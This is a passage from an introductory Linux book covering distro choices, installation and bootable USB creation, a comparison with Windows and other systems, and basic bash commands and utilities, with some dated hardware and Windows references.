can have some drawbacks: Debian does not prioritize getting the latest
updates for applications that you have, which means that you may have to
manually search for the latest release of most software that you own. The
upside is that you can run Debian on numerous processor architectures, and it
is very likely to run on old builds.
However, this does not mean that going with Debian is having to remain
outdated – it has a lot of programs available online and in Linux repositories.
4. OpenSUSE
OpenSUSE is a great distro to consider because it allows you to configure
your OS without needing the command line. It usually defaults to the KDE
desktop, but also lets you choose between LXDE, KDE, XFCE, and GNOME as you
install the distro package. It also provides good documentation, the YaST
package manager, and great support from the community.
One of the drawbacks that you may have when using this distro is that it can
consume a lot of resources, which means that it is not ideal to use on older
processor models and netbooks.
5. Arch Linux
Arch Linux is the distro for those that want to build their operating system
from scratch. All that you are going to get from the installation package from
the start is the command line, which you will use to get applications, desktop
environment, drivers, and so on. This means that you can aim to be as
minimal or as heavy in features, depending on what your needs are.
If you want to be completely aware of what is inside your operating system,
then Arch Linux is probably the best distro for you to start with. You will be
forced to deal with any possible errors that you may get, which can be a great
way to learn about operating Linux.
Another thing that makes this distro special is Pacman, its powerful package
manager. Arch follows a rolling-release model, which means you always install
the latest version of every package, ensuring you get cutting-edge
applications and features for your Linux. Apart from this package manager,
you also get to enjoy the AUR (Arch User Repository), which lets the
community publish installable versions of available programs. This means that
if you want a program that is not available in the official Arch
repositories, you can use an AUR helper to install it like a normal package.
Chapter 4 Setting up a Linux System
As for the preparation of disk space, this is the most crucial moment in the
whole process of installing Linux. The fact is that if you install the system on
a computer whose hard disk already has any data, then it is here that you
should be careful not to accidentally lose it. If you install a Linux system on a
“clean” computer or at least on a new hard disk, where there is no data, then
everything is much simpler.
Why can’t you install Linux in the same partition where you already have, for
example, Windows, even with enough free space?
The fact is that Windows uses the FAT32 file system (in old versions, FAT16)
or NTFS (in Windows NT/2000), while Linux uses a completely different system
called the Second Extended File System (ext2fs; in newer versions, the
journaling ext3fs). These file systems must be located on different
partitions of the hard disk.
Note that in Linux, physical hard disks are referred to as the first is hda, the
second is hdb, the third is hdc, and so on (hdd, hde, hdf...).
Sometimes the installation program shows the full device names: /dev/hda
instead of hda, /dev/hdb instead of hdb, and so on; for our purposes these
are the same thing. The logical partitions of each disk are numbered, so a
hda physical disk may hold hda1, hda2, and so on, while hdb may hold hdb1,
hdb2, and so on. Do not be confused if these numbers are not always
consecutive; it does not matter here.
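You can check how the kernel names the disks and partitions on your own machine; note that modern kernels usually use sda, sdb, ... rather than hda, hdb for SATA and USB disks:

```shell
# Disks and partitions the kernel currently knows about.
cat /proc/partitions

# The corresponding device nodes live under /dev.
ls /dev/sd* /dev/hd* 2>/dev/null || echo "no sd*/hd* devices visible here"
```

Each partition appears both in /proc/partitions and as a /dev node, which is the name the installer will show you.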
How to start installing Linux from disk
To begin installing Linux, insert the system CD into the drive and restart
the computer, selecting boot from CD. If you plan to install Linux over
Windows, the installation program can be run directly from it. Under Windows
95/98 the installation will start immediately, while if the installer was
launched from a more advanced system, such as Windows 2000, XP, Vista, or 7,
you will still have to restart the computer from the CD.
Your computer may already be configured to boot from a CD. If the boot
from the CD does not occur, when you restart your computer, enter the BIOS
settings. On most systems, to do this, immediately after turning on the
computer or restarting, press the Delete key or F11.
After that, find the Advanced BIOS Settings section. Sometimes the section
name may be different, but in any case, it is very similar to that in this book.
Enter it by first moving the pointer to it using the cursor keys and then
pressing the Enter key. Now find among the parameters either the Boot
Sequence item (boot order) or, failing that, the 1st Boot Device item. Use
the cursor keys to select the desired item and, changing its value with the
Page Up and Page Down keys, set CD-ROM as the first boot device.
Press the Esc key to exit the section, and then F10 to exit the BIOS with the
saved settings. Most likely, the computer will ask you to confirm this
intention. Usually, to confirm, you must press the Y key, which means yes.
All modern computers can boot from a CD. If for some reason your computer
does not have this capability, you will have to create a boot diskette to install
Linux. There are always special tools for this on the Linux distribution CD.
Usually, they are located in a folder called dos tools (or in a folder with a
similar name). There are images of boot floppies and a DOS program for
creating them. Read the README files on the distribution CD for more
detailed instructions.
The installation of the Linux operating system can be divided into several
stages:
disk space preparation;
selection of the programs (packages) you need;
device and graphical interface configuration;
bootloader installation.
The installation program takes control of the entire process. You should only
answer questions if the installation does not occur in fully automatic mode.
How to make a bootable USB flash drive for Linux

Today, Linux is becoming increasingly popular. Surely you
have already heard from your friends or acquaintances stories about how easy
it is to carry out such an installation. Creating a bootable USB flash drive
for Linux is a great way to install the operating system on a computer with a
damaged or missing optical drive, such as a laptop or netbook. Let's get
acquainted with this installation method!
First, you need to find and download a Linux operating system image. Finding
images of different versions of Linux on the Internet is very simple, because
Linux is free software and is distributed at no cost. Download the desired
image from the distribution's official website or via torrents.
A bootable Linux flash drive requires only an ordinary flash drive with a
capacity of 1 GB or more.
Next, you need to download the Unetbootin program, which will help us create
the bootable Linux flash drive. You can download it from
unetbootin.sourceforge.net. At the top of the site there are buttons for
three platforms: Windows, Linux, and Mac OS. If you are currently on Windows,
for example, press the Windows button.
After downloading, the program opens instantly; you do not need to install
it. If you have problems launching it (on Windows 7), run it as administrator.
By default, the program has the "Distribution" option selected, but we need
to select "Diskimage" instead and indicate that it is an ISO image. Next,
click the "..." button and select the image we previously downloaded from the
Internet.
If your flash drive is capacious enough, it is advisable to allocate some
space for persistent file storage; 100 MB will be enough.
At the very bottom of the program window, select which flash drive to write
to, for example "Type: USB Drive; Drive: E:\". If only one flash drive is
inserted into the computer, the program will detect it on its own and there
is no need to choose anything.
It remains only to press the "OK" button and wait until the program
completes the burning of the image. This takes 5-10 minutes.
That is all you need to know about burning Linux to a USB flash drive.
Afterwards, restart the computer, or insert the USB flash drive into the
computer where you want to install the Linux operating system.
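If you already have access to a Linux machine, the same bootable flash drive can be created from the command line with dd. This is only a sketch: linux.iso and /dev/sdX are placeholders for your actual image file and flash-drive device, and writing to the wrong device will irreversibly destroy its contents.

```shell
# Check which device is the flash drive first (e.g. with `lsblk`).
# WARNING: everything on /dev/sdX will be erased.
sudo dd if=linux.iso of=/dev/sdX bs=4M status=progress
sync    # flush all buffered writes to the drive before removing it
```

After dd finishes, the drive boots just like one prepared with Unetbootin.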
How to choose programs to install
So, the most crucial moment – the layout of the hard drive – is behind us. Now
the installation program proceeds to the next stage, in which it will offer to
select the necessary programs (packages are traditionally called programs in
Linux, which, by the way, is truer in terms of terminology).
You can simply choose one of the options for installing packages (for home
computer, office, workstation with a connection to a local network, etc.).
Alternatively, by turning on the Package selection switch manually, go to the
software package selection window.
All programs included in the distribution of Linux are divided in this window
into several sections: system, graphic, text, publishing, sound, games,
documentation, and so on. In each section, you can select (or, conversely,
deselect) any software package. If it is not clear from the name of the
program what it is for, click on the name, and a brief description of the
purpose of this program will appear in a special window. Unfortunately, in
Russian-language distributions, often not all descriptions are translated into
Russian, so some descriptions may be in English.
Having chosen the necessary packages for installation, be sure to locate the
dependency-checking option on the screen and enable it. The point is that
some programs may depend on others, that is, they may use modules of other
programs in their work.
Some programs may require the presence of any other software packages for
normal operation. In this case, they say that one program depends on another.
For example, the kreatecd CD burning program contains only a graphical
user interface and calls the cdrecord console program for the actual recording,
although the user doesn’t see it when working.
This means that the kreatecd program depends on cdrecord. When installing
Linux, all software dependencies are checked automatically; you just need to
allow the installation program to do this by turning on the appropriate switch.
The checkbox for checking dependencies is needed for the installer to
automatically check if some of the selected programs are using those
packages that are not selected for installation. Having made such a check, the
installation program will provide you with a list of these packages and will
offer to install them as well. We should agree with this, otherwise, some
programs will not work.
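This idea of one program using pieces of another can also be observed at the level of shared libraries: the ldd utility lists the libraries an executable depends on. /bin/ls here is just a convenient example binary.

```shell
# List the shared libraries that the `ls` binary was linked against.
# Each line names a required library and where it was found on this system.
ldd /bin/ls
```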

Configure devices and graphical interface


After you agree to install the necessary packages, the process of copying the
necessary files to the hard disk will begin. This process is quite long, so you
can go and drink coffee at this time, for at least five to ten minutes. However,
if your distribution is recorded on two or more compact discs, the installer
will from time to time ask you to insert the necessary compact disc into the
drive.
Then the configuration of additional devices and the graphical interface will
begin. There is one subtlety: most installation programs for some reason
process information about the mouse incorrectly. Therefore, when the
installer asks what kind of mouse you have at this stage, simply answer "a
simple two-button" or "a simple three-button" mouse. Do not search the list
for a manufacturer, model, and so on.
After installing the system, it will be possible to separately enable additional
functions of the mouse (for example, the operation of the scroll wheel) if they
do not work themselves.
Install the bootloader
After all the above operations, the freshly installed system is ready for
operation. However, the installer will ask you to answer one more question:
should the boot loader be installed and, in most cases, if necessary, which
one?
If Linux is the only operating system on your computer, then you will not
need a bootloader. In this case, simply restart the computer, removing the
bootable CD from it.
If you specifically changed the BIOS settings in order to allow the computer
to boot from a CD or from a floppy disk, then now, after installing the
system, you can reconfigure the computer to boot only from the hard disk. To
do this, go back to the BIOS settings and change the boot order. However, if
you specified the "universal" boot order – Floppy, CDROM, IDE-0 – you need
not change anything; just make sure that no bootable diskette or CD is left in
the computer when you turn it on or restart it, unless you actually need to
boot from those devices.
Connecting to the Internet with Linux
Connection to the Internet is carried out using a physical channel between
your computer and the provider's server.
There are three main methods for organizing a physical connection:

a wireless network;
a local network;
a modem, over which data is exchanged using the PPP protocol.
In the first case, a wireless access point is required; only if one is available
can you set up a wireless connection to the Internet.
The second method is used when your computer is connected to a local
network, in which there is a server for access to the world wide web. In this
case, you do not need to put your efforts into the organization of the
connection – the local network administrator will do all that is necessary for
you. Just launch a browser, enter the URL you are interested in, and access it.
And the third way is a dial-up modem connection. In this case, the
administrator will not help you, so you have to do everything yourself. For
these reasons, we decided to consider this method in more detail.
First, naturally, you should have a modem and a telephone. Next, you need to
decide on the provider that provides access to the Internet and get from it the
phone number by which your PC will connect to the modem pool of the
provider and, of course, your username and password to access the global
network.
Next, you need to configure the PPP protocol. This can be done manually, or
you can use the configuration program. Manual configuration is quite
complicated and requires editing files and writing scripts. Therefore, it is
preferable for beginners to work with a special program that automates the
entire process of setting up access to the Internet.

This program is called kppp and is originally included in the KDE graphical
environment. This utility makes it much easier to set up a connection and, in
most cases, requires you to only correctly specify accounting information.
Chapter 5 Comparison between Linux and other
Operating Systems
Even though the Linux operating system can easily co-exist with other
operating systems on the same machine, there are still differences between it
and systems such as OS/2, Windows 95/98, Windows NT, and other
implementations of UNIX for the personal computer. We can compare and
contrast Linux with these other operating systems on the following points.
Linux is a Version of UNIX
Windows NT and OS/2 can be said to be multitasking operating systems, just
like Linux. Technically, both are similar to Linux in features such as
networking, user interface, and security. But neither of them is a version of
UNIX, while Linux is. That is the difference: being a version of UNIX, Linux
enjoys the benefits of the contributions of the UNIX community at large.
Full use of the x86 processor
It is a known fact that Windows versions such as Windows 95/98 cannot fully
utilize the functionality of the x86 processor, but the Linux operating system
runs entirely in this processor's protected mode and exploits all the features
therein, including support for multiple processors.
Linux OS is free
Other operating systems are commercial, and although Windows is
comparatively inexpensive, the cost of some of them is high for most personal
computer users: some retail operating systems cost as much as $1000 or more,
compared to free Linux. The Linux software is free because anyone with
access to the Internet, or to another computer on a network, can download it
at no cost and install it. Another good option is to copy Linux from a friend's
system that already has the software.
Runs a complete UNIX system
Unlike other operating systems, with Linux one can run an entire UNIX
system at home without incurring the high cost of other UNIX
implementations. Moreover, there are tools that enable Linux to interact with
Windows, so it becomes effortless to access Windows files from Linux.
Linux OS still does more than Windows NT
More advanced operating systems are always on the rise in the world of
personal computers, like Microsoft Windows NT, which is now popular for
server computing. Unlike Linux, however, Windows NT cannot benefit from
the contributions of the UNIX community. Windows NT is also a proprietary
system: its interface and design are owned and controlled by one corporation,
Microsoft, and only that corporation may implement the design, so there may
not be a free version of it for a very long time.
Linux OS is more stable
Linux and operating systems such as Windows NT are battling for a fair
share of the server computing market. Windows NT has the full support of
the Microsoft marketing machine, but the Linux operating system has the
help of a community of thousands of developers who are advancing it
through the open-source model. Each operating system has its weak and
strong points, but Linux stands out here: other operating systems, especially
Windows NT, can crash easily and often, while Linux machines are more
stable and can run continuously for extended periods.
Linux has better networking performance than others
Linux can be said to be notably better when it comes to networking
performance, even though it is also smaller than Windows NT. It has a better
price-performance ratio and can compete favorably with other operating
systems because of its effective open-source development process.
Linux works better with other implementations of UNIX
Unlike other operating systems, Linux works well with other
implementations of UNIX: its features are similar to those of the other UNIX
implementations for the personal computer. Linux is also made to support an
extensive range of hardware, because under the open-source model there is
demand for Linux to support almost every kind of graphics card, sound
board, SCSI adapter, and so on.
Booting and file naming
With Linux, there is no limitation on booting: it can be booted from either a
logical partition or a primary partition. Other operating systems such as
Windows are restricted to booting from a primary partition. Linux file names
are case sensitive, while in others, such as Windows, they are case
insensitive.
Linux operating system is customizable
Unlike other operating systems, most notably Windows, the Linux operating
system can be personalized: a user can modify the code to suit any need,
which is not possible with the others. One can even change the look and feel
of the Linux OS.
Separating the directories
In Linux, directories are separated using a forward slash, while in Windows
the separation is done with a backslash. Linux also uses a monolithic kernel,
which naturally takes more running space, unlike operating systems that use
a microkernel, which consumes less space but whose efficiency is a lot lower
than Linux's.
Chapter 6 Linux Command Lines
At this juncture, you should have a fair understanding of basic commands,
and Linux should be installed on your system. You now have an incredible
opportunity ahead of you: a completely blank slate on which you can begin to
shape an operating system. With Linux, you can easily customize your
operating system so that it does exactly what you would like it to do. To get
started, you need to install a selection of reliable and functional applications.
For ease of explanation, it is assumed that you are using Ubuntu. When you
are looking to install an application in Linux, the process is quite different
than what you would encounter in Windows. With Windows, you normally
need to download an installation package sourced at a website, and then you
can install the application.
With Linux, this process is not necessary as most of the applications are
stored in the distribution’s repositories. To find these applications, follow
these steps.
Go to System -> Administration -> Synaptic Package Manager
When you get to this point, you need to search for the package that you
require. In this example, the package is called comp. You can also install the
package from the command line as follows:
sudo apt-get install comp
Linux also has another advantage over some popular operating systems: the
ability to install more than one package at a time, without having to complete
one process after another in separate windows. It all comes down to what is
entered on the command line. An example of this is as follows:
sudo apt-get install comp beta-browser
There are even more advantages (other than convenience) to being able to
install multiple packages. In Linux, these advantages include updating.
Rather than updating each application, one at a time, Linux allows for all the
applications to be updated simultaneously through the update manager.
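On a Debian-based distribution such as Ubuntu, this simultaneous update can also be done from the command line. The two commands below are a sketch of the usual sequence; the exact commands differ on other distributions.

```shell
# Refresh the package index so the system knows about new versions...
sudo apt-get update
# ...then upgrade all installed packages in a single pass.
sudo apt-get upgrade
```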
The Linux repository is diverse, and a proper search through it will help you
to identify a large variety of apps that you will find useful. Should there be an
application that you need which is not available in the repository, Linux will
give you instructions on how you can add separate repositories.
The Command Line
Using Linux allows you to customize your system to fit your needs. For those
who are not tech savvy, the distribution's settings are a good place to change
things until you get what you want. However, you could spend hours fiddling
with the available settings and still fail to find the setup that is perfect for
you. Luckily, Linux has a solution, and it comes in the form of the command
line. Even though the command line sounds complex, like something that can
only be understood by a tech genius, it is quite simple to grasp.
The beauty of adjusting things in your operating system using the command
line is that the sky is the limit, and creativity can abound.
To begin, you need to use “The Shell”. This is basically a program which can
take in commands from your keyboard and ensure that the operating systems
performs these commands. You will also need to start a “Terminal”. A
terminal is also a program and it allows you to interact with the shell.
To start a terminal, select the terminal option from the menu. This gives you
access to a shell session, in which you can begin practicing your commands.
In your shell session, you will see a shell prompt. It shows your username
and the name of the machine that you are using, followed by a dollar sign. It
will appear as follows:
[name@mylinux me] $
If you type something meaningless at this shell prompt, you will see a
message from bash. For example:
[name@mylinux me] $ lmnopqrst
bash: lmnopqrst: command not found
This is an error message where the system lets you know that it is unable to
comprehend the information you put in. If you press the up-arrow key, you
will find that you can go back to your previous command, the lmnopqrst one.
If you press the down arrow key, you will find yourself on a blank line.
This is important to note because you can then see how you end up with a
command history. A command history will make it easier for you to retrace
your steps and make corrections as you learn how to use the command
prompt.
Command Lines for System Information
The most basic and perhaps most useful command lines are those that will
help you with system information. To start, you can try the following: -
Command for Date
This is a command that will help you to display the date.
root@compsis:~# date
Thu May 21 12:31:29 IST 2015
Command for Calendar
This command will help display the calendar of the current month, or any
other month that may be coming up.
root@compsis:~# cal
Command for uname
This command is for Unix Name, and it will provide detailed information
about the name of the machine, its operating system and the Kernel.
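For example (the exact output naturally differs from machine to machine):

```shell
uname -a    # everything at once: kernel name, hostname, release, architecture
uname -s    # just the kernel name, e.g. "Linux"
uname -r    # just the kernel release
```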
Navigating Linux Using Command Lines
You can use the command lines in the same way that you would use a mouse,
to easily navigate through your Linux operating system so that you can
complete the tasks you require. In this section, you will be introduced to the
most commonly used commands.
Finding files in Linux is simple: just as in familiar Windows programs, files
follow a hierarchical directory structure. This structure resembles a list of
folders, and its levels are referred to as directories.
The primary directory within a file system is referred to as a root directory. In
it, you will be able to source files, and subdirectories which could contain
additional sorted files. All files are stored under a single tree, even if there are
several storage devices.
pwd
pwd stands for print working directory. This command tells you which
directory you are currently standing in, and with it you can keep track of
where your files are stored. Command lines do not give any graphical
representation of the filing structure; however, when using a command-line
interface, you can still view all the files within a parent directory and all the
paths that exist to its subdirectories.
This is where the pwd comes in. Anytime that you are simply standing in a
directory, you are in a working directory. The moment you log onto your
Linux operating system, you will arrive in your home directory (which will
be your working directory while you are in it). In this directory, you can find
all your files. To identify the name of the directory that you are in, you
should use the following pwd command.
[name@mylinux me] $pwd
/home/me
You can then begin exploring within the directory by using the ls command.
ls stands for list files in the directory. Therefore, to view all the files that are
in your working directory, type in the following command and you will see
results as illustrated below.
[name@mylinux me] $ls
Desktop bin linuxcmd
GNUstep ndeit.rpm nsmail
cd
cd stands for change directory. This is the command to use when you want to
switch from your working directory and view other files. To use it, you need
to know the pathname of the directory that you want to view. There are two
different types of pathname: the absolute pathname and the relative
pathname.
The absolute pathname is one that starts at your root directory, and by
following a file path, it will easily lead you to your desired directory.
Suppose your absolute pathname for a directory is /usr/bin. The first
directory is known as usr, and there is another directory within it named bin.
If you want to use the cd command to go to this absolute pathname, type the
following:
[name@mylinux me] $ cd /usr/bin
[name@mylinux me] $ pwd
/usr/bin
[name@mylinux me] $ ls
When you enter this information, you would have succeeded in changing
your working directory to /usr/bin.
You can use a relative pathname when you want to change from the new
working directory, /usr/bin, to its parent directory, /usr. To execute this, type
the following:
[name@mylinux me] $cd ..
[name@mylinux me] $pwd
/usr
Using relative pathnames cuts down on the amount of typing that you must
do when using command lines; therefore, it is recommended that you learn as
many of them as possible.
When you want to access a file using Linux command prompts, take note
that they are case sensitive. Unlike the files you would find on Windows
operating systems and programs, files in Linux do not need file extensions.
This is great because it gives you the flexibility of labeling files anything you
like. One thing to be careful of is the application programs that you use:
some may automatically create extensions on files, and it is these that you
need to watch out for.
Chapter 7 Introduction to Linux Shell

Working effectively as a Linux professional is unthinkable without the
command line.
The command line is a shell prompt that indicates the system is ready to
accept a user command; it can be thought of as a dialogue between the user
and the system. For each command entered, the user receives a response from
the system:
1. another prompt, indicating that the command has been executed and the
next one can be entered;
2. an error message, a statement from the system about events in it,
addressed to the user.
To users accustomed to working in systems with a graphical interface, the
command line may seem inconvenient. However, in Linux this type of
interface has always been the basic one, and it is therefore well developed.
The shells used in Linux offer plenty of ways to save effort, that is,
keystrokes, when performing the most common actions:

automatic completion of long command names or file names
searching for and re-executing a command that was once performed before
substitution of lists of file names matching a pattern, and much more
The advantages of the command line are especially obvious when you need
to perform similar operations on many objects. In a system with a graphical
interface you need as many mouse drags as there are objects; on the
command line, one command will be enough.
This section will describe the main tools that allow you to solve any user
tasks using the command line: from trivial operations with files and
directories, for example, copying, renaming, searching, to complex tasks
requiring massive similar operations that occur as in the user's application
work, when working with large data arrays or text, and in system
administration.

Shells

A command shell, or command interpreter, is a program whose task is to
transfer your commands to the operating system and application programs,
and their answers back to you. In its role it corresponds to command.com in
MS-DOS or cmd.exe in Windows, but functionally the shell in Linux is
incomparably richer. In the shell's command language you can write small
programs (scripts) that perform a series of sequential operations on files and
the data they contain.
Having logged into the system by entering a username and password, you
will see the command line prompt: a line ending in $. Later, this symbol will
be used to denote the command line. If during the installation a graphical
user interface was configured to start at system boot, you can still get to the
command line on any virtual text console by pressing Ctrl-Alt-F1 through
Ctrl-Alt-F6, or by using any terminal-emulation program, for example,
xterm.
The following shells are available. They may differ depending on the
distributor:
bash
The most common shell for Linux. It can complement the names of
commands and files, keeps a history of commands and provides the ability to
edit them.
pdksh
A clone of the Korn shell, well known on UNIX systems.
sash
The peculiarity of this shell is that it does not depend on any shared libraries
and includes simplified implementations of some of the most important
utilities, such as ls, dd, and gzip. Therefore, sash is especially useful when
recovering from system crashes or when upgrading the most important
shared libraries.
tcsh
Improved version of C shell.
zsh
The newest of the shells listed here. It implements advanced features for
autocompletion of command arguments and many other functions that make
working with the shell even more convenient and efficient. However, note
that all zsh extensions are disabled by default, so before you start using this
command shell, you need to read its documentation and enable the features
that you need.
The default shell is bash, the Bourne Again Shell. To check which shell you
are using, type the command: echo $SHELL.
Shells differ from each other not only in capabilities but also in command
syntax. If you are a novice user, we recommend that you use bash; the
examples below describe work in this particular shell.
Bash shell
The command line in bash is composed of the name of the command,
followed by keys (options) that modify the command's behavior. Keys begin
with the character - or --, and often consist of a single letter. After the keys,
arguments (parameters) can follow: the names of the objects on which the
command must be executed (often the names of files and directories).
Entering a command is completed by pressing the Enter key, after which the
command is transferred to the shell for execution. As a result of the command
execution on the user’s terminal, there may appear messages about the
command execution or errors, and the appearance of the next command line
prompt (ending with the $ character) indicates that the command has
completed and you can enter the next one.
There are several techniques in bash that make it easier to type and edit the
command line. For example, using the keyboard, you can:
Ctrl-A
go to the beginning of the line. The same can be done by pressing the Home
key;
Ctrl-u
delete current line;
Ctrl-C
Abort the execution of the current command.
You can use the symbol ; in order to enter several commands on one line.
bash records the history of all executed commands, so it is easy to repeat or
edit a previous one. To do so, simply select the desired command from the
history: the up arrow key displays the previous command, the down arrow
key the next one. To find a specific command among those already executed,
without flipping through the whole history, press Ctrl-R and enter some
keyword used in the command you are looking for.

Commands that appear in the history are numbered. To run a specific
command, type:
!command_number
If you enter !!, the last command typed is run again.
Sometimes on Linux, the names of programs and commands are too long.
Fortunately, bash itself can complete the names. By pressing the Tab key,
you can complete the name of a command, program, or directory. For
example, suppose you want to use the bunzip2 decompression program. To
do this, type:
bu
Then press Tab. If nothing happens, there are several possible ways of
completing the command. Pressing the Tab key again will give you a list of
the names starting with bu. For example, suppose the system has the
programs buildhash, builtin, and bunzip2:
$ bu
buildhash builtin bunzip2
$ bu
Type n (bunzip2 is the only name whose third letter is n), then press Tab. The
shell will complete the name, and it remains only to press Enter to run the
command!
Note that a program invoked from the command line is searched for by bash
in the directories defined in the PATH system variable. By default, this
directory list does not include the current directory, denoted by ./ (dot slash).
Therefore, to run the prog program from the current directory, you must issue
the command ./prog.
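A short experiment demonstrates this; the script name prog is arbitrary:

```shell
# Create a tiny shell script in the current directory and make it executable.
printf '#!/bin/sh\necho hello from prog\n' > prog
chmod +x prog
# Running it requires the explicit ./ prefix, because "." is not in $PATH:
./prog          # prints "hello from prog"
```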

Basic commands

The first tasks that have to be solved in any system are: working with data
(usually stored in files) and managing programs (processes) running on the
system. Below are the commands that allow you to perform the most
important operations on working with files and processes. Only the first of
these, cd, is part of the actual shell, the rest are distributed separately, but are
always available on any Linux system. All the commands below can be run
both in the text console and in graphical mode (xterm, KDE console). For
more information on each command, use the man command, for example:
man ls
cd
Allows you to change the current directory (to navigate through the file
system). It works with both absolute and relative paths. Suppose you are in
your home directory and want to go to its tmp/ subdirectory. To do this, enter
the relative path:
cd tmp/
To change to the /usr/bin directory, type the absolute path:
cd /usr/bin/
Some options for using the command are:
cd ..
Moves to the parent of the current directory (note the space between cd
and ..).
cd -
Returns to the previous directory. The cd command with no parameters
returns the shell to the home directory.
ls
ls (list) lists the files in the current directory. Two main options: -a shows all
files, including hidden ones; -l displays more detailed information.
rm
This command is used to delete files. Warning: deleting the file, you cannot
restore it! Syntax: rm filename.
This program has several parameters. The most frequently used are: -i, which
asks for confirmation before each deletion, and -r, which deletes recursively
(i.e. including subdirectories and hidden files). Example:
rm -i ~/html/*.html
Removes all .html files in your html directory, asking before each one.
mkdir, rmdir
The mkdir command allows you to create a directory, while rmdir deletes a
directory, provided it is empty. Syntax:
mkdir dir_name
rmdir dir_name
The rmdir command is often replaced by the rm -rf command, which allows
you to delete directories, even if they are not empty.
less
less allows you to view a file page by page. Syntax:
less filename
It is useful to review a file before editing it. The main use of this command,
however, is as the final link in a chain of programs that outputs a significant
amount of text that does not fit on one screen and would otherwise flash by
too quickly. To exit less, press q (quit).

grep
This command allows you to find a string of characters in the file. Please note
that grep searches by a regular expression, that is, it provides the ability to
specify a template for searching a whole class of words at once. In the
language of regular expressions, it is possible to make patterns describing, for
example, the following classes of strings: “four digits in a row, surrounded by
spaces”. Obviously, such an expression can be used to search in the text of all
the years written in numbers. The search capabilities for regular expressions
are very wide. For more information, you can refer to the on-screen
documentation on grep (man grep). Syntax:
grep pattern filename
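For instance, the class of strings described above, four digits in a row surrounded by spaces, can be searched for like this (the sample file is invented for the example):

```shell
# Build a small sample file...
printf 'born in 1984 here\nno year on this line\nalso 2015 appears\n' > years.txt
# ...and print every line containing a space-delimited four-digit number:
grep ' [0-9][0-9][0-9][0-9] ' years.txt
# prints the lines containing " 1984 " and " 2015 "
```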

ps

Displays a list of current processes. The COMMAND column indicates the
process name; the PID (process identifier) is the process number, used for
operations on the process, for example for sending signals with the kill
command. Syntax:
ps arguments
The argument u gives you more information; ax allows you to view those
processes that do not belong to you.
kill
If the program stops responding or hangs, use this command to complete it.
Syntax:
kill PID_number
The PID_number here is the process identification number; you can find out
the process number of each running program using the ps command.
Normally, the kill command sends a normal termination signal to the process,
but sometimes this does not work, and you will need to use kill -9
PID_number.
In this case, the command will be immediately terminated by the system
without the possibility of saving data (abnormal). The list of signals that the
kill command can send to a process can be obtained by issuing the command
kill -l.
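A harmless way to practice is to start a long-running background process and terminate it; sleep stands in here for a hung program:

```shell
sleep 1000 &     # start a long-running process in the background
pid=$!           # $! holds the PID of the last background job
ps -p "$pid"     # confirm that it is running
kill "$pid"      # send the default termination signal (SIGTERM)
```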
File and Directory Operations

Here we consider utilities that work with file system objects: files,
directories, devices, as well as file systems in general.
cp
Copies files and directories.
mv
Moves (renames) files.
rm
Removes files and directories.
df
Displays a report on the use of disk space (free space on all disks).
du
Calculates disk space occupied by files or directories.
ln
Creates links to files.
ls
Lists files in a directory, supports several different output formats.
mkdir
Creates directories.
touch
Changes file timestamps (last modified, last accessed), can be used to create
empty files.
realpath
Calculates absolute file name by relative.
basename
Removes the path from the full file name (i.e., shortens the absolute file name
to relative).
dirname
Removes the file name from the full file name (that is, it displays the full
name of the directory where the file is located).
pwd
Displays the name of the current directory.

Filters

Filters are programs that read data from standard input, convert it and output
it to standard output. Using filtering software allows you to organize a
pipeline: to perform several sequential operations on data in a single
command. More information about standard I / O redirection and the pipeline
can be found in the documentation for bash or another command shell. Many
of the commands listed in this section can work with files.
cat
combines files and displays them to standard output;
tac
combines files and displays them on standard output, starting from the end;
sort
sorts rows;
uniq
removes duplicate lines from sorted files;
tr
performs the replacement of certain characters in the standard input for other
specific characters in the standard output, can be used for transliteration,
deletion of extra characters and for more complex substitutions;
cut
systematized data in text format can be processed using the cut utility, which
displays the specified part of each line of the file; cut allows you to display
only the specified fields (data from some columns of the table in which the
contents of the cells are separated by a standard character — a tabulation
character or any other), as well as characters standing in a certain place in a
line;
paste
combines data from several files into one table, in which the data from each
source file make up a separate column;
csplit
divides the file into parts according to the template;
expand
converts tabs to spaces;
unexpand
converts spaces to tabs;
fmt
formats the text in width;
fold
transfers too long text lines to the next line;
nl
numbers file lines;
od
displays the file in octal, hexadecimal and other similar forms;
tee
duplicates the standard output of the program in a file on disk;
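To see how filters chain into a pipeline, here is a small sketch (fruits.txt and sorted_fruits.txt are invented names):

```shell
printf 'banana\napple\nbanana\ncherry\n' > fruits.txt

# sort the lines, drop the duplicate with uniq, number the survivors
# with nl, and use tee to save a copy while still printing to screen
sort fruits.txt | uniq | nl | tee sorted_fruits.txt
```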

Other commands

head
displays the initial part of the file of the specified size;
tail
outputs the final part of a file of a given size; because it can keep
printing data as it is appended to the end of the file, it is often used to
follow log files, etc.;
echo
displays the text of the argument on the standard output;
false
does nothing, comes out with a return code of 1 (error), can be used in shell
scripts if an unsuccessful command is being attempted;
true
does nothing, comes out with a return code of 0 (successful completion), can
be used in scripts if a successful command is required;
yes
infinitely prints the same line (by default, yes) until it is interrupted.
seq
displays a series of numbers in a given range of successively increasing or
decreasing by a specified amount;
sleep
suspends execution for a specified number of seconds;
usleep
suspends execution for a specified number of microseconds;
comm
compares 2 pre-sorted (by the sort command) files line by line, displays a
table of three columns, where in the first are lines unique to the first file, in
the second are unique to the second, in the third they are common to both
files;
join
combines the lines of two files on a common join field: for each pair of
input lines with identical join fields, it writes a combined line to standard
output. By default the join field is the first one, and fields are separated
by whitespace.
split
splits the file into pieces of a given size.
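A few of these commands in action (numbers.txt and the part_ prefix are arbitrary names):

```shell
seq 1 10 > numbers.txt         # the numbers 1 through 10, one per line

head -n 3 numbers.txt          # first three lines
tail -n 2 numbers.txt          # last two lines
split -l 5 numbers.txt part_   # two 5-line pieces: part_aa and part_ab
```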
Calculations
In addition to simple operations with strings (input/output and merging), it is
often necessary to perform some calculations on the available data. Listed
below are utilities that perform calculations on numbers, dates, strings.
test
returns true or false depending on the value of the arguments; The test
command is useful in scripts to check conditions;
date
displays and sets the system date, in addition, it can be used for calculations
over dates;
expr
evaluates expressions;
md5sum
calculates checksum using MD5 algorithm;
sha1sum
calculates checksum using SHA1 algorithm;
wc
counts the number of lines, words, and characters in the file;
factor
decomposes numbers into prime factors;
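A short sketch of the calculation utilities (words.txt is a made-up file name):

```shell
printf 'one two three\nfour five\n' > words.txt

wc -l words.txt    # number of lines
wc -w words.txt    # number of words
expr 6 + 7         # prints 13
factor 84          # prints 84: 2 2 3 7
md5sum words.txt   # checksum followed by the file name
```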

Search

The search for information in the file system can be divided into a search by
file attributes (understanding them extensively, that is, including the name,
path, etc.) and content search. For these types of search, the programs find
